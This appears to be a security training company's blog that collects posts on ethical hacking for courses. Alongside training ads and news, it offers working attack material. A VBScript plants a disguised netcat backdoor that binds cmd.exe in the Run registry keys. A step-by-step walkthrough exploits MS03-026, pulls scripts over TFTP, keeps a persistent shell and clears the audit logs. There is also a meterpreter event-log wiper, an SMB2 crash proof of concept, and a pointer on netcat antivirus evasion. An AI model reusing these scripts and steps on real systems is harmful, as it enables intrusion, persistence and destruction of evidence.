Simple FTP Fuzzer

Guys, want to see the FTP Fuzzer?
Here is an example...

#Metasploit

require 'msf/core'
class Metasploit3 < Msf::Auxiliary
       include Msf::Auxiliary::Scanner
       def initialize
               super(
                       'Name'           => '3Com TFTP Fuzzer',
                       'Version'        => '$Revision: 1 $',
                       'Description'    => '3Com TFTP Fuzzer Passes Overly Long Transport Mode String',
                       'Author'         => 'Your name here',
                       'License'        => MSF_LICENSE
               )
               register_options( [
               Opt::RPORT(69)
               ], self.class)
       end
       def run_host(ip)
               # Create an unbound UDP socket
               udp_sock = Rex::Socket::Udp.create(
                       'Context'   =>
                               {
                                       'Msf'        => framework,
                                       'MsfExploit' => self,
                               }
               )
               count = 10  # Set an initial count
               while count < 2000  # While the count is under 2000 run
                       evil = "A" * count  # Set a number of "A"s equal to count
                       pkt = "\x00\x02" + "\x41" + "\x00" + evil + "\x00"  # Define the payload
                       udp_sock.sendto(pkt, ip, datastore['RPORT'])  # Send the packet
                       print_status("Sending: #{evil}")  # Status update
                       resp = udp_sock.get(1)  # Capture the response
                       count += 10  # Increase count by 10, and loop
               end
       end
end

Metasploit Framework 3.3 No GUI & Web

As of Metasploit Framework 3.3, msfgui and msfweb will no longer be supported.

:) cihuy...

Tutorial: VBScript in Action

Here is an example of a VBScript that will Enable Remote Desktop and Plant Trojan or Backdoor (such as Netcat) or known as Persistent Netcat.

' This VBScript will do the following:
' 1. Enable Remote Desktop
' 2. Plant Trojan or Backdoor in the Registry
'
' Rename your Netcat (nc.exe) as winntsvr.exe as a "camouflage"

Dim objShell, RegLocate, RegLocate1
Set objShell = WScript.CreateObject("WScript.Shell")
On Error Resume Next

' Enable Remote Desktop
RegLocate = "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\fDenyTSConnections"
objShell.RegWrite RegLocate,"0","REG_DWORD"

' Plant Trojan or Backdoor in the Registry
RegLocate =
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Update"
objShell.RegWrite RegLocate,"C:\WINDOWS\System32\winntsvr -v -L -p443 -d -e cmd.exe","REG_SZ"

RegLocate =
"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\Update"
objShell.RegWrite RegLocate,"C:\WINDOWS\System32\winntsvr -v -L -p443 -d -e cmd.exe","REG_SZ"

' Reverse Connect
' On the Target: winntsvr -v -L -p443 -d -e cmd.exe
' On the Attacker: nc -v 131.107.1.254 443

' Bind Connect
' On the Target: winntsvr -v 131.107.1.222 443 -d -e cmd.exe
' On the Attacker: nc -v -l -p443

WScript.Quit

Netcat and AntiVirus (bypass) ...

If your Netcat is detected by AntiVirus, you can do something with it.

Check this out:
http://www.packetstormsecurity.org/papers/virus/Taking_Back_Netcat.pdf

Good tutorial :)

Tutorial: Complete Hacking Steps

Complete Hacking Steps (TEST-XP2 vs DEN-WEB2) - Classic Method 

TEST-XP2 = 131.107.1.222
DEN-WEB2 = 131.107.1.254

Step 1: Information Gathering (Scanning)

Scan Target with Nmap:
nmap -A 131.107.1.254

Step 2: Vulnerability Identification

Use Google search to find vulnerabilities on 131.107.1.254, based on the result of Step 1.

Example: MS03-026 (MS-RPC DCOM Vulnerability) or Scan with Nessus vulnerability scanner.

Step 3: Gain Access/Exploitation

Use Metasploit Framework 2.x or 3.x. Find the correct module (eq. MS03-026)

>> Metasploit 2.x

msf > use msrpc_dcom_ms03_026
msf > set PAYLOAD win32_bind
msf > set RHOST 131.107.1.254
msf > set LPORT 5555
msf > exploit

>> Metasploit 3.x

msf > use windows/dcerpc/ms03_026_dcom
msf > set PAYLOAD windows/shell/bind_tcp
msf > set RHOST 131.107.1.254
msf > set LPORT 5555
msf > exploit

Step 4: Maintain Access

Ensure that you have launched the TFTPD32 (tftp server).

Upload all necessary scripts...
C:\WINDOWS\System32>tftp -i 131.107.1.222 GET start.cmd
C:\WINDOWS\System32>tftp -i 131.107.1.222 GET cleanup.cmd

Run the script...
C:\WINDOWS\System32>start.cmd

On TEST-XP2 machine, do the following:

Connect via Remote Desktop ...
User: myadmin
Password: P@ssw0rd

Open a new command prompt.
Launch Netcat to connect to the open port 443 on the remote machine...
Z:\Tools\NC>nc -v 131.107.1.254 443

Open another new command prompt.
Force the Target machine to reboot ...

Option 1: PSShutdown
Z:\Tools\SysinternalsSuite>psshutdown -r -f -u myadmin -p P@ssw0rd \\131.107.1.254

Option 2: Metasploit module
msf > use msasn1_ms04_007_killbill
msf > set PAYLOAD win32_bind
msf > set RHOST 131.107.1.254
msf > exploit

After rebooted, log on to DEN-WEB2 machine with:
User: administrator
Password: P@ssw0rd

Switch to TEST-XP2 machine.

You should see your Netcat get connected.
Now you can connect to the Target machine at anytime.

If not, re-run the command:

Z:\Tools\NC>nc -v 131.107.1.254 443

Step 5: Cover Tracks/Housekeeping

Close your Metasploit Framework console window.
Switch to the Netcat opened command prompt.

Run the housekeeping script...

C:\WINDOWS\System32>cleanup.cmd

Check the Audit settings and Event logs. All should be cleared.

New Security Books - Recommended by Me!

Check this out:

Nmap Network Scanning
http://www.amazon.com/Nmap-Network-Scanning-Official-Discovery/dp/0979958717/ref=sr_1_1?ie=UTF8&s=books&qid=1257826537&sr=8-1

Professional Penetration Tester
http://www.amazon.com/Professional-Penetration-Testing-Creating-Operating/dp/1597494259/ref=sr_1_1?ie=UTF8&s=books&qid=1257826622&sr=1-1

I have read these books and I found that they have discussed lot of interesting topics. Must have for Security Professionals.

For DVD contents, please email me.

Metasploit Framework 3.x Meterpreter Script

In the last step of Hacking, we know that we need to "clear the tracks" or known as "housekeeping". If you use meterpreter payload, you could run this script to clear the logs on the victim machine:

ClearLogs.rb

# Clears Windows Event Logs

evtlogs = [
'security',
'system',
'application',
'directory service',
'dns server',
'file replication service'
]
puts ("Clearing Event Logs, this will leave an event 517")
evtlogs.each do |evl|
puts ("Clearing the #{evl} Event Log")
log = client.sys.eventlog.open(evl)
log.clear
end
puts ("All Clear! You are a Ninja!")

Save it and call it within the meterpreter.

meterpreter > run clearlogs

and Bingo! all logs are cleared...

Immunity Debugger

Immunity Debugger is a powerful new way to write exploits, analyze malware, and reverse engineer binary files. It builds on a solid user interface with function graphing, the industry's first heap analysis tool built specifically for heap creation, and a large and well supported Python API for easy extensibility.

- A debugger with functionality designed specifically for the security industry
- Cuts exploit development time by 50%
- Simple, understandable interfaces
- Robust and powerful scripting language for automating intelligent debugging
- Lightweight and fast debugging to prevent corruption during complex analysis
- Connectivity to fuzzers and exploit development tools

Check it out:
http://www.immunityinc.com/products-immdbg.shtml

It's Free!!!

Vulnerabilities in SMB Could Allow Remote Code Execution

Check this out:
http://www.microsoft.com/technet/security/advisory/975497.mspx
and this...
http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-3103

Credit: http://g-laurent.blogspot.com/

I have personally tested with Windows Vista SP2 and Windows Server 2008 SP2.
All worked fine...

It's actually caused by the SRV2.SYS driver used by Vista, Windows Server 2008 and Windows 7 RC. It does not seem to effect Windows Server 2003, Windows XP and Windows 2000.

PoC:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field
it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket
from time import sleep

host = "IP_ADDR", 445

buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Vmware Virtual Machine Image Files Unauthorized Usage

For those who use the CEH/ECSA/LPT and CHFI Vmware virtual machine image files "Created by Semi", please do not hesitate to inform me as I'm tracking the usage of those files. Any illegal or unauthorized usage detected should not be tolerate as I was creating them for the purpose of my delivery in EC-Council security related courses/training.

- Semi

Sample EC-Council Exam Questions

Those who would like to get some samples of the EC-Council exam questions (with answers) can request directly to me. Just email me and get a free samples of CEH, CHFI, EDRP and ECSA questions and answers for your practice or exercise purposes.

- Semi

Nmap 5.0 Released

Nmap by Fyodor is one of my favourites Hacking and Penetration Tools, besides hping2, scanline, unicorn scan and xprobe2.

Recently the latest Nmap 5.0 has just released by insecure.org. It has more than 600 significant changes. The top 5 improvement in Nmap includes: Ncat, Ndiff and NSE.

For more info, refer to: http://www.insecure.org

- Semi

IIS 6.0 WebDav Vulnerability Scan with Nmap

The latest Nmap 4.85BETA released and now supports scanning the recent IIS 6.0 WebDav Vulnerability.

Syntax:
nmap --script http-iis-webdav-vuln -p80,8080

Output example:
80/tcp open http syn-ack-- _ http-iis-webdav-vuln: WebDAV is ENABLED. Vulnerable folders discovered: /secret, /webdav

Metasploit Framework 3.3 also added their auxiliary module for the same function.

To update your MSF, ensure that you have the Internet connection then type:

cd /pentest/exploit/framework3
svn update

Check the latest auxiliary:

show auxiliary

- Semi

iFrame Injection Attack

Recently, I found several websites were attacked by "JS/Kryptik.B.Trojan", injecting iFrame to the html and php files.

Visit this site more info:
http://www.diovo.com/2009/03/hidden-iframe-injection-attacks

One of our partner has appointed us to cleanup the infected files. We provide this kind of services upon request.

- Semi

Penetration Testing and Vulnerability Assessment

A good website for those who are interested in Penetration Testing and Vulnerability Assessment:
http://www.vulnerabilityassessment.co.uk

- Semi

Speaking Engagement

If you are interested on inviting us for seminars or workshops, please directly contact us via email. The schedule should be informed at least 2 weeks before the commercing date.

Topics includes:
1. Network Security & Digital Forensics
2. Security Awarness Programme
3. Ethical Hacking
4. Penetration Testing
6. Microsoft, Cisco, Novell and CIW related topics

- Semi

Customized Training

Our current customized training:

- Wireshark Network Security and Forensics
- Penetration Testing with BackTrack (BT3)
- Metasploit: Tactical Exploitation

All training are based on the Instructor Led Training (ILT).

- Semi

Important Update -- Regarding My Personal Blog

Important Update:
Due to some technical problems, I regret to inform you that my personal blog: http://semiyulianto.blogspot.com will no longer active. All future blog posting such as tutorials, news, updates and training related matters will be posted here in our official blog.

- Semi

Recent Incidents

Just for your info:

Recently my personal Yahoo and GMail email accounts was "hijacked" by someone who I suspect was my CEH students from the previous batch in year 2008.

I believe this student was not happy due to an unknown reason. I have traced some evidences from some emails forwarded by one of my friends. I'm currently still hunting down the suspect.

If you happened to received emails from:

semi_y2000@yahoo.com and/or semi.yulianto@gmail.com

These emails are fake emails and NOT TRUSTED. Please ignore them as the perpetrator/hijacker was trying to do some bad things. So, please be AWARE!!!

- Semi

Welcome to FlexiTrain Official Blog

This blog is created to better support our clients and customers as well as students who have attended our training. Feel free to send us your comments and suggestions. Contact us: semi.yulianto@flexi-train.com or belly@flexi-train.com

- Semi